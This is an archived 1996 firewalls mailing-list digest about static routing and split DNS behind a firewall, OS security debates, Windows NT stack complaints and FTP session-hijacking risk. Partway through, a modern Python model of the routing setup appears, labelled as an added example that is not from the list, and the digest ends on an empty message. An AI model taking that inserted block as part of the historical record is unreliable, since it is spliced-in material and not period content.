To: firewalls@greatcircle.com
Message-id: <9602081121.AA00997@amchelix.amc.uva.nl>
X-Envelope-to: firewalls@greatcircle.com
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
Content-MD5: 15UJU/sKpFbCd3Wir2vc5w==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

fpmw> I am testing our fw-1 and have got a question before
fpmw> implementing our security.
fpmw> I will use dual homed g/w with fw-1 and connect each ends to the internet
fpmw> and our internal network.
fpmw>
fpmw> Our net -- Router ----- F/W ---- Router -- Internet
fpmw>                                  |
fpmw>                              BBS Server
...
fpmw> The question is that each router can exchange each routing table or not ?
fpmw> If can , How it's possible. ?

It can. It depends on what you want. You turn `rip services' on and off. But it's also possible to do this for igrp, bgp and egp.

fpmw> Our network person assumes the G/W with F/W must use rip protocol.
fpmw> In our case he won't recommend the rip protocol due to its heavy traffic.

I doubt rip produces much traffic. Normally rip tables are spread once in 30 seconds.

fpmw> If it is not possible , please explain in detail how to reach to the
fpmw> BBS server from the Our net.

In case you're *not* using rip or other routing protocol, you should add static routes on your F/W and internal router. I assumed some IP-addresses on the routers and your BBS station:

Your net -------- Router ------------ FW -------+------- Router ------ internet
        aaa.1          bbb.2   bbb.1     ccc.2  |  ccc.1          ddd.2
                                                |
                                                | ccc.3
                                               BBS

On FW:
    default via ccc.1
    your net via bbb.2
On Router:
    default via bbb.1

You don't need (mustn't) to define a routing rule for directly connected subnets.

fpmw> If it must use static routing, how to reach internet just with name from our
fpmw> net. Our internal DNS server maintains internal names only and Our policy
fpmw> is to let Our net users go out without restriction and Internet users
fpmw> be prohibited in some extents.

`Internet' should be able to locate the name of your net. A nice solution is an external dns and an internal dns. The FW and the two DNS's should be configured so that they communicate (forwarding). But internet sees only two or three machines (the DNS + BBS? + FW(ccc.2)?) The FW should be configured such that only DNS requests from your external DNS are allowed and vice versa. In this way DNS information is available but your net remains invisible (you can allow ping and deny telnet and so on)

Frank
-------------------------------------------------
F.P.M.
Wetzels ADIV/CNS D01-319.1 f.wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Thu Feb 8 03:54:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15153 for firewalls-outgoing; Thu, 8 Feb 1996 03:08:31 -0800 (PST) Received: from iez.com (mail.iez.com [194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA15142 for ; Thu, 8 Feb 1996 03:08:14 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09429; Thu, 8 Feb 1996 12:08:02 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009425; Thu Feb 8 12:07:56 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA12965; Thu, 8 Feb 1996 12:05:50 +0100 Message-Id: <9602081105.AA12965@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29495; Thu, 8 Feb 96 12:05:48 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA07866; Thu, 8 Feb 96 12:05:46 +0100 From: Rolf Weber Subject: Re: Most Secure Unix? To: spencerj@dg-rtp.dg.com (Jon Spencer) Date: Thu, 8 Feb 1996 12:05:46 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: <9602072343.AA05372@tsgops.rtp.dg.com> from "Jon Spencer" at Feb 7, 96 06:43:21 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I think perhaps my point wasn't made clearly. The firewall can only be as > good as the OS on which it exists. If your firewall is an application > on top of an OS, I can break the firewall by breaking the OS. > i never heard of any breakin possible because of a kernel bug. may be i'm wrong, may be it's possible, but i cannot imagine. > > Well, "impossible" is a very big word to use! Especially, since this is > exactly what we have. 
If your assumption is that the firewall is an > application, then I do agree with you. That is why the functions of a > firewall need to be a base component of a high assurance OS (so you know > that they work). Then you run the WWW server on that OS, and you (apparently) > have the impossible. :-) > i don't trust *no* WWW server on *no* OS. > > It does matter. And so does limiting the effects of human failure, which will > always be present. When you make a human SUPER user, you have amplified > that users mistakes. So here is one path to travel to limit human mistakes. > But this is not the place for a tutorial on how to deal with the REAL risks > of a computing environment. Suffice it to say that if you don't deal with > them, your firewall won't work, your home page will be violated, and > termites will eat your mouse pad. > > That is why I reassert that if your base OS (including the admin environment) > is not high assurance and does not deal with the real threats, your > firewall is not very good. > i fear this will go to an endless discussion... IMHO, it's senseless to discuss which OS is secure and which not. how will you prove it? my company is a softwarehouse, and we are using a lot of different UNIXes. a few years ago, we got a new OS which was announced to be a C2 system. /etc/passwd was owned by 'bin'! every host which appeared in /etc/hosts.equiv could modify it. i had a really great ROTFL and stopped even thinking about security classifications. i know about my configuration, i know how far i can trust it and where the (possible) vulnerabilities are. that's the most important. may be a ''high security UNIX`` is useful on a multiuser system. on a firewall, where root should be the only user, it doesn't hurt, that's all. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. 
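The static-route and split-DNS layout in Frank Wetzels' reply above (Re: routing table go through firewall ?), modelled as an added example that is not from the list. The RFC 5737 documentation addresses, the two DNS server addresses and the exact filter rules are constructed assumptions standing in for his aaa/bbb/ccc/ddd placeholders and his prose policy.

```python
"""Model of the dual-homed topology from the routing reply: static routes on
the FW and internal router, and the filter policy that keeps 'your net'
invisible while the Internet sees only the BBS, the external DNS and the FW.
All addresses are constructed (RFC 5737) stand-ins, not real hosts."""
import ipaddress

YOUR_NET = ipaddress.ip_network("192.0.2.0/24")      # aaa: the internal net
FW_NET = ipaddress.ip_network("198.51.100.0/24")     # bbb: internal router <-> FW
DMZ_NET = ipaddress.ip_network("203.0.113.0/24")     # ccc: FW, ext router, BBS
DEFAULT = ipaddress.ip_network("0.0.0.0/0")

INT_ROUTER_IN = "198.51.100.2"   # bbb.2, internal router's FW-side address
FW_INSIDE = "198.51.100.1"       # bbb.1
FW_OUTSIDE = "203.0.113.2"       # ccc.2
EXT_ROUTER = "203.0.113.1"       # ccc.1
BBS = "203.0.113.3"              # ccc.3
EXT_DNS = "203.0.113.4"          # constructed: external DNS placed in the DMZ
INT_DNS = "192.0.2.53"           # constructed: internal DNS inside 'your net'

# Directly connected subnets need no static route, as the reply says.
FW_CONNECTED = [FW_NET, DMZ_NET]
INT_ROUTER_CONNECTED = [YOUR_NET, FW_NET]


def fw_routes():
    """FW: 'default via ccc.1, your net via bbb.2'."""
    return [(YOUR_NET, INT_ROUTER_IN), (DEFAULT, EXT_ROUTER)]


def int_router_routes():
    """Internal router: 'default via bbb.1'."""
    return [(DEFAULT, FW_INSIDE)]


def next_hop(routes, connected, dst):
    """Longest-prefix lookup; a directly connected subnet wins outright."""
    addr = ipaddress.ip_address(dst)
    for net in connected:
        if addr in net:
            return "connected"
    best = None
    for net, gateway in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway)
    return best[1] if best else None


def forward(dst):
    """Trace the hops a packet from 'your net' takes towards dst."""
    hops = ["internal router"]
    nh = next_hop(int_router_routes(), INT_ROUTER_CONNECTED, dst)
    if nh == "connected":
        return hops + ["delivered"]
    hops.append("FW via " + nh)
    nh = next_hop(fw_routes(), FW_CONNECTED, dst)
    return hops + (["delivered"] if nh == "connected" else ["external router via " + nh])


def fw_policy(src, dst, proto, dport=None):
    """Filter decision derived from the reply's policy (assumed rule set):
    inside users go out unrestricted, DNS crosses the FW only between the two
    DNS servers, and from outside only the BBS, the external DNS (port 53)
    and ping to the FW are reachable. Returns 'allow' or 'deny'."""
    if ipaddress.ip_address(src) in YOUR_NET:
        if proto == "udp" and dport == 53:
            return "allow" if (src == INT_DNS and dst == EXT_DNS) else "deny"
        return "allow"
    if dst == BBS:
        return "allow"
    if proto == "udp" and dport == 53:
        if dst == EXT_DNS:
            return "allow"                       # Internet resolves your names here
        if dst == INT_DNS and src == EXT_DNS:
            return "allow"                       # forwarding between the two DNS's
    if proto == "icmp" and dst == FW_OUTSIDE:
        return "allow"                           # 'you can allow ping and deny telnet'
    return "deny"


if __name__ == "__main__":
    print(forward(BBS))
    print(fw_policy("172.16.0.1", INT_DNS, "udp", 53))
```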
From firewalls-owner Thu Feb 8 04:39:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19107 for firewalls-outgoing; Thu, 8 Feb 1996 04:25:01 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19094 for ; Thu, 8 Feb 1996 04:24:53 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19567; Thu, 8 Feb 1996 07:23:59 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0290; Thu, 08 Feb 96 07:24:32 -0500 Message-Id: <9602081224.AA0290@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 68D97D4CC72345E7852562CA0042B92C; Thu, 8 Feb 96 07:24:25 To: security , firewalls-digest From: Warren Moore Date: 8 Feb 96 7:15:10 Subject: Security Policies Made Easy X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Bruno Mamer said: >Just a small question, last August, "Jim Carroll" talked of the book >"Information Security Policies Made Easy". > >We've decided to buy it but lack references. Does anyone have the editor, >ISBN number ? Not precisely, but this should do: Author: Charles Cresson Wood Publisher: Baseline Software, Sausalito, CA Tel: 415-332-7763 FAX: 415-332-8032 Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. 
From firewalls-owner Thu Feb 8 04:54:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19316 for firewalls-outgoing; Thu, 8 Feb 1996 04:28:55 -0800 (PST) Received: from ns.gbnet.net (ns.gbnet.net [194.70.126.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA19293 for ; Thu, 8 Feb 1996 04:28:44 -0800 (PST) Received: (from jrg@localhost) by ns.gbnet.net (8.7.3/8.6.12) id MAA01584; Thu, 8 Feb 1996 12:26:33 GMT Date: Thu, 8 Feb 1996 12:26:33 GMT From: James R Grinter Message-Id: <199602081226.MAA01584@ns.gbnet.net> X-Subliminal: H is for Hypertext X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: "Jason L. Haar" Subject: Re: anybody know of any vulnerabilities with "echo" Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu 8 Feb, 1996, "Jason L. Haar" wrote: >I wonder, this smells heavily of the "Harverst cache Web server". >Harvest uses some pretty wild checks on upstream web sites to see if >they're up or not - the default is to "ping" the host using UDP echo >packets - that could be what you're seeing. > >Of course, it goes without saying that such sites shouldn't set up such >things without ASKING those sites first... The reason it can be configured to send those UDP packets (but *isn't* by default) is to attempt to determine if it will be quicker to fetch the file from source rather than going through its cache hierarchy. If you don't want people to be able to retrieve things quickly from your web server where possible... James. 
From firewalls-owner Thu Feb 8 05:23:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20306 for firewalls-outgoing; Thu, 8 Feb 1996 04:45:50 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20280 for ; Thu, 8 Feb 1996 04:45:33 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19939; Thu, 8 Feb 1996 07:44:09 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0382; Thu, 08 Feb 96 07:44:41 -0500 Message-Id: <9602081244.AA0382@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9BBFD18CE5F0EF95852562CA0043C751; Thu, 8 Feb 96 07:44:41 To: firewalls-digest From: Warren Moore Date: 8 Feb 96 7:42:42 Subject: I want details!!! Re: NT's TCP/IP stack X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996 13:23:28 -0600 (CST), my mailer thinks that Robert Dana said: >One of the most valuable things about forums like this is the potential to >share information that cuts through all the BS that floats around out there in >the form of marketing materials and vendor-biased trade publications. I'm >constantly disappointed about how little valuable knowledge is really posted. >And please- keep your OS religion to yourself. Sure, UNIX is what I'm most >comfortable with for now, but that doesn't change the fact that I have to deal >with NT whether I want to or not. GIVE US FACTS. One small voice of sanity...hooray! Ladies & gents, the vast majority of you who post to this list give all the appearances of really knowing your stuff...which is a great help to those of us who are NOT networking geeks, but some other sort of geek (IBM Mainframe/applications background? Gasp! 
Durn tootin' younker, and I can still remember coding programs for an IBM 705 in machine language back when men were men and sheep were scared.) Believe it or not, many of us who are responsible for securing our corporations' information would just as soon that Billy Boy would strike his tents and leave...but he won't...and lots and lots of executives who don't know diddley about technology just luv them perty windows, and couldn't spell Eunuchs if they had to. OK, so enter the OS of your choice: ???? SUCKS! Fine. Please tell me why, in some detail. I really *need* to know, to help me try and convince those same executives that maybe, just maybe, NT/OS2 (half-OS?)/WfW/or whatever isn't the right box to place one's eggs in. Thanx... Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Thu Feb 8 05:39:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA21554 for firewalls-outgoing; Thu, 8 Feb 1996 05:15:12 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA21549 for ; Thu, 8 Feb 1996 05:15:06 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA18105; Thu, 8 Feb 1996 08:13:56 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma018101; Thu Feb 8 08:13:29 1996 Date: Thu, 8 Feb 1996 08:13:28 -0500 (EST) From: Chris Woods To: "Christopher A. Stewart" cc: Ian Miller , firewalls@GreatCircle.COM Subject: Re: Global broadcasts In-Reply-To: <199602080631.WAA00518@www.mazama.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Christopher A. Stewart wrote: > Not very far, it's an illegal address.. Never seen that come over the > internet. 
But I have seen 0.0.0.0 off the net as a source > address. What client sent that anyhow? I believe it was NetManage's Chameleon. Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Thu Feb 8 05:55:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA23518 for firewalls-outgoing; Thu, 8 Feb 1996 05:49:45 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA23490 for ; Thu, 8 Feb 1996 05:49:34 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA18475; Thu, 8 Feb 1996 08:48:40 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma018473; Thu Feb 8 08:48:39 1996 Date: Thu, 8 Feb 1996 08:48:38 -0500 (EST) From: Chris Woods To: Ed Woodrick cc: firewalls@greatcircle.com Subject: RE: NT's TCP/IP stack In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It is my opinion that many take NT too seriously. I, too, gave NT a valiant try. I ran an ISP for a couple years, and we tried putting all kinds of services on NT, starting with web servers. Any web server that was hit more than a few times per minute would require a daily reboot. I also set up NT as a router: what a f***ing joke that was! That machine crashed almost hourly if it was recieving any traffic. We had to *lie* to the setup to get it to see that there were 2 ethernet cards in the box. It had network routes in the routing table for some unknown and seemingly arbitrary network which *could not* be removed. 
I am the type of person who always first assumes that problems like these are due to operator error. However, after bashing through things for days, even weeks, I called the tech support of Microsoft and the vendors who released the software we were using (ORA WebSite, Netscape Commerce Server). They, and MSKB, pointed out that the problems I was having were due to *known bugs* for which they did not have an estimated time of repair. Remote administration was a joke. I had the NT Admin pack installed on my Win95 boxen at the office and at home. Whenever the web server would die (the machine is no longer accepting connections to port 80) I would fire up server manager to try to kill and restart the job from there. Upon trying to kill it NT would say that "There is an error stopping this service, blahblah". It would then say that it was not running, as soon as I tried to restart it, the machine went nuts, swapping like crazy (drive light on *solid*). Running ORA WebSite, I sat on a Netscape client on the same LAN and loaded up a page (normal page, no java, not even any CGI) from that server. Hit "Reload" about 10 times in rapid succession on the client. Server crashed and burned. I couldn't even shut it down cleanly, it was swapping so hard the mouse cursor wouldn't even move. OK, this was about 4 months ago. OK, Microsoft (or O'Reilly, or Netscape, whoever may have been the source of each particular problem I had, there were countless more) may have fixed some of these problems. However, I have been building these servers on *nix boxen for years, and other than the first time setting each up, I have never had a problem that could not be easily eplained by hardware problems (i.e. trying to run innd on a 486, what a joke.). On Wed, 7 Feb 1996, Ed Woodrick wrote: > Jeromie, > > Well so far I haven't heard of anybody cracking through NT. The = > Microsoft Web and FTP sites are using NT and they are continually hacked = > at. 
NT itself has received C2 security which if nothing else means that = > you should be able to adequately see and log what is going on. > > There are quite a few Internet servers running NT at this point. I think = > most people would be surprised with the number. I have run NT at a = > couple companies and have had no problems with the TCP/IP stack. Most = > problems are with applications that try to install their own winsock.dll = > and those that are only winsock compatible with their own stack. I've = > run quite a bit of Netbios over TCP/IP with no problems. > > Let me put it this way, Win95 got a really bad rap when a backdoor was = > found on it, and Win95 really doesn't have security. I would highly = > expect that if NT had been compromised, that it would be front page Wall = > Street News. > > Ed Woodrick > EDCOM > > ---------- > From: jeromie@garrison.com[SMTP:jeromie@garrison.com] > Sent: Tuesday, February 06, 1996 8:03 PM > To: firewalls@greatcircle.com > Subject: NT's TCP/IP stack > > As we have all seen in the last few weeks, there have been several > people who have been ragging on Windows NT TCP/IP stack. I would like = > to hear > some comments on real problems that have been detected. I have looked = > around > the net, although no hard-fact information could I find. NT appears to = > have > some good qualities, ease-of-use, although I am unsure about several = > things. > > The integrity of the OS. Nobody can test it well. Who's to say what = > holes are > under the hood that nobody has a good chance to look at. > > The TCP/IP stack has been said to have problems. > > They are not a security company, therefore I am very unwilling to assume = > they > have done the proper testing for security purposes. For that matter, I = > am=20 > unwilling to assume the product isn't full of "Microsoft Features" that = > are > undocumented.. 
>
> I would be very interested in hearing about these issues.
>
> Jeromie Jackson
> Director of Technology
> Garrison Associates
> jeromie@garrison.com
>

Chris Woods
Systems Administrator cjwoods@paladin.com
Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/
Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html

From firewalls-owner Thu Feb 8 06:07:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA21976 for firewalls-outgoing; Thu, 8 Feb 1996 05:23:09 -0800 (PST)
Received: from faui45.informatik.uni-erlangen.de (faui45.informatik.uni-erlangen.de [131.188.2.45]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA21954 for ; Thu, 8 Feb 1996 05:22:35 -0800 (PST)
Received: from faui01.informatik.uni-erlangen.de (root@faui01.informatik.uni-erlangen.de [131.188.2.1]) by uni-erlangen.de with ESMTP id OAA03145 (8.6.12/7.4f-FAU);; Thu, 8 Feb 1996 14:19:52 +0100
Received: from gundel (tnsturm@faui04g.informatik.uni-erlangen.de [131.188.63.16]) by cip.informatik.uni-erlangen.de with SMTP id OAA28617 (8.6.12/7.4h-FAU);; Thu, 8 Feb 1996 14:19:07 +0100
Message-ID: <3119F849.167EB0E7@cip.informatik.uni-erlangen.de>
Date: Thu, 08 Feb 1996 14:19:05 +0100
From: Torsten Sturm
Organization: CSD, Univ. Erlangen-Nuernberg, Germany
X-Mailer: Mozilla 2.0 (X11; I; SunOS 4.1.3 sun4m)
MIME-Version: 1.0
To: Eduardo Torres
CC: firewalls@greatcircle.com
Subject: Re: DNS for NT
References: <199602071037.AA18039@server1.startel.com.ar>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Eduardo Torres wrote:
>
> -- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] --
>
> Can anyone recommend a good DNS solution for NT?

There is a direct and unlimited port of the actual BIND package, very stable, just as the unix thing, and for free...
It is maintained by

_________________________________________________________________________
Larry Kahn, Senior Software Engineer, kahn@drcoffsite.com, Dynamics Research Corp.
(TALK/WEBTALK: larry@ambra.drcoffsite.com) (FINGER: .site@ambra.drcoffsite.com for PGP public key)
[ASCII-art signature banner omitted]
_________________________________________________________________________

Please ask him to get his ftp-server.

HTH
Torsten
--
__________________________________________________________________
http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html

From firewalls-owner Thu Feb 8 06:41:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA26072 for firewalls-outgoing; Thu, 8 Feb 1996 06:33:51 -0800 (PST)
Received: from mailhost1.postnet.se (mailhost1.postnet.se [194.14.20.72]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA26040 for ; Thu, 8 Feb 1996 06:33:34 -0800 (PST)
Received: (from adm@localhost) by mailhost1.postnet.se (8.7/8.7) id PAA02405 for ; Thu, 8 Feb 1996 15:27:29 +0100 (MET)
X-Authentication-Warning: mailhost1.postnet.se: adm set sender to using -f
Received: from unknown(193.44.52.150) by mailhost1 via smap (V1.3) id sma002400; Thu Feb 8 15:27:15 1996
Message-ID: <3119743F.7522@mailbox.postnet.se>
Date: Thu, 08 Feb 1996 04:55:43 +0100
From: Per Josefsson
Organization: PostNet AB
X-Mailer: Mozilla 2.0 (Win16; I)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: Risk for session hijacknig
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My need is to let users upload files with ftp; those files have to be secret for, say, two months.
It seems that a common precaution is to use one-time passwords, but it seems to me that the opinion of this mailing list is that it isn't enough.

Does anyone have an opinion about the risk one exposes oneself to by allowing inbound sessions through a firewall? I think that there isn't an absolutely secure solution; even strong cryptography is breakable (if you have the time (and the plaintext)). How long would it take to take over an ISP's router and install software to take over my users' sessions?

Regards
Per Josefsson

From firewalls-owner Thu Feb 8 07:24:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA28015 for firewalls-outgoing; Thu, 8 Feb 1996 07:10:53 -0800 (PST)
Received: from bbnplanet.com (poblano.near.net [198.114.157.116]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA28010 for ; Thu, 8 Feb 1996 07:10:49 -0800 (PST)
Received: from osborn.bbnplanet.com by poblano.bbnplanet.com id aa19531; 8 Feb 96 10:10 EST
Message-ID: <311A11E9.193A399E@bbnplanet.com>
Date: Thu, 08 Feb 1996 10:08:25 -0500
From: Chris Osborn
X-Mailer: Mozilla 2.0 (X11; I; Linux 1.2.13 i586)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: Re: I want details!!! Re: NT's TCP/IP stack
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Chris Osborn wrote:
>
> Robert Dana wrote:
> >
> > OK, I'm getting really frustrated about the lack of details about NT's
> > deficiencies.
> > I couldn't care less about OS bigotry- I'll use whatever systems
>
> > [text deleted]
> >
> > Scott Barman writes:
> > > Hopefully, when folks put NT on the internet, they will find the same
> > > thing I found through experimentation: it has multitasking that can't
> > > get out of its own way, it can't handle the load of a medium-low
> > > environment, and if something goes wrong, there isn't a quick interface
> > > to fix things (by passing that maze of twisty little menus all
> > > different!).
>
This is a valid argument against using NT. Many operations in NT do require many levels of menus to finally find the correct option. It is often easier to give technical support to the poor user by telling them "type kill -HUP blah" instead of "click on this, click on that", etc etc. This is especially true when troubleshooting and many modifications must be made in rapid succession until the "right one" is found. Much troubleshooting time on NT is waiting for the GUI (or rebooting the server). The command line can be the difference between 5 minutes of downtime or 1/2 hour of downtime (expand that forward as appropriate).
> Of course NT applications could be written with the command line options available.
> The NT command line isn't that shabby but the application builders are not allowing use of it.
>
>
> > > [...]
> >
> > > Yea, it's called living the hype and believing the b.s. from marketing
> > > machines. No controversy here--especially when I don't believe what I
> > > read or hear from know M.$.... err... b.s. artists.
> >
> > I don't mean to single Scott out- his is just the most recent example. We can
> > bitch about MS's unsubstantiated marketing claims all we want, but making
> > similarly unsubstantiated claims opposing them doesn't help at all. Exactly
> > what are the deficiencies of the IP or TCP implementations of NT for the
> > environment most of us care about (IP over ethernet)?
> > Why won't a firewall on
> > NT be capable of handling a connection faster than 64k?
>
Unfortunately we can't be sure (if it is indeed the case). One can fire packets at the machine and say X packets were dropped and be sure about that. BUT.. As to why they are dropped, there are a limited number of ways to find out:
1) Look at the source and find the inefficient code :-).
2) try changing the registry until performance improves although I have found that more cryptic than a lot of source code
   a) the gui makes this take a LONG time as you wait for it to load
>
As with others, I would feel more comfortable hearing NUMBERS to back up some of these claims about firewall XXX on OS YYY being slow/fast. Inclusion of any relevant data would be nice. This does not only apply to NT based firewalls.
> [text deleted]
>
> > ep your OS religion to yourself. Sure, UNIX is what I'm most
> > comfortable with for now, but that doesn't change the fact that I have to deal
> > with NT whether I want to or not. GIVE US FACTS.
>
NT is coming along fast. I think microsoft has pumped a lot of money into it and many corporations are going to NT based solutions. Why? One because they are at the same stage that IBM was a few years ago ... remember "Can't go wrong with buying IBM".
> Two, it is easy to use. Unix had a shot but lost out. Nobody wanted to make unix BOTH easy to use and powerful. There are finally (within the last couple years) firewalls and other apps under UNIX that use a decent GUI. I could rant on how there are 15 different guis for unix etc etc.
> Is NT ready for prime time corporate networking including use in the firewall arena? Not really, for example rebooting is far too common a procedure when doing anything on NT. Don't want to be rebooting my mission critical server every time I change a network configuration.
> NT is getting better with each revision and will be a force to be reckoned with as the processors and memory get cheaper.
> All these comments are made by a UNIX weenie.
>
> >
> > -Robert
> >
> > --
> > Robert Dana (713) 650-6522 x240
> > Director of Network Services
> > WorldCom, the International Network for Lotus Notes
>
+-------------------------------------------------------------------+
Chris Osborn BBN Planet cosborn@bbnplanet.com Software Engineer

From firewalls-owner Thu Feb 8 08:29:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00117 for firewalls-outgoing; Thu, 8 Feb 1996 08:01:00 -0800 (PST)
Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA29994 for ; Thu, 8 Feb 1996 08:00:53 -0800 (PST)
Received: from netsurfer by netsurfer.pixi.com ; 8 FEB 96 05:57:43
Date: Thu, 8 Feb 1996 05:57:42 -1000 (HST)
From: NetSurfer
X-Sender: netsurf@netsurfer
To: firewalls@greatcircle.com
Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply
In-Reply-To:
Message-ID:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 7 Feb 1996, Chris Jenkins wrote:

> Since MS gives you TCP/IP and WINSOCK, most third party applications
> should be able to run. If I recall correctly, I think that some of Chameleon's
> applications will run on MS tcp/ip stack.

Not on NT AFAIK unless you have the NT version of Chameleon.
#include
[ASCII-art signature banner omitted]

From firewalls-owner Thu Feb 8 08:33:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00263 for firewalls-outgoing; Thu, 8 Feb 1996 08:05:53 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00258 for ; Thu, 8 Feb 1996 08:05:49 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id IAA24760; Thu, 8 Feb 1996 08:02:15 -0800
Received: from relay6.uu.net(192.48.96.16) by mycroft via smap (V1.3mjr) id sma024758; Thu Feb 8 08:01:41 1996
Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQacay12345; Thu, 8 Feb 1996 11:03:13 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28068; Thu, 8 Feb 96 10:52:37 EST
Date: Thu, 8 Feb 1996 10:52:36 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Unix hack
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hukd on Fonix asked:

